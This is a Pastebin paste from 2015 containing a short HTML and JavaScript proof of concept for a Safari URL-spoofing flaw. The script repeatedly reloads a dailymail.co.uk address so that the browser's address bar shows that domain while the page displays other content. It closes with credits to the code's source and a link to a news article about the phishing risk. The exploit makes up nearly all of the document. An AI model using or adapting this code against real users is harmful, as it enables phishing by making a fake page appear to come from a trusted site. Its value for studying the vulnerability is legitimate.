Advertisement
Guest User

Safari URL Spoofing PoC

a guest
May 19th, 2015
323
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.45 KB | None | 0 0
  1. <title>Whatever</title>
  2. <h1>Address bar says dailymail.co.uk - this is NOT dailymail.co.uk</h1>
  3. <script>
  4. function f()
  5. {
  6. location="http://www.dailymail.co.uk/home/index.html?random="+Math.random();
  7. }
  8. setInterval("f()",10);
  9. </script>
  10.  
  11. <!--
  12. Code from here:
  13. http://www.deusen.co.uk/items/iwhere.9500182225526788/
  14.  
  15. Article:
  16. http://news.softpedia.com/news/Same-Origin-Policy-Bypass-in-Safari-Opens-Door-for-Phishing-Attacks-481621.shtml
  17. -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement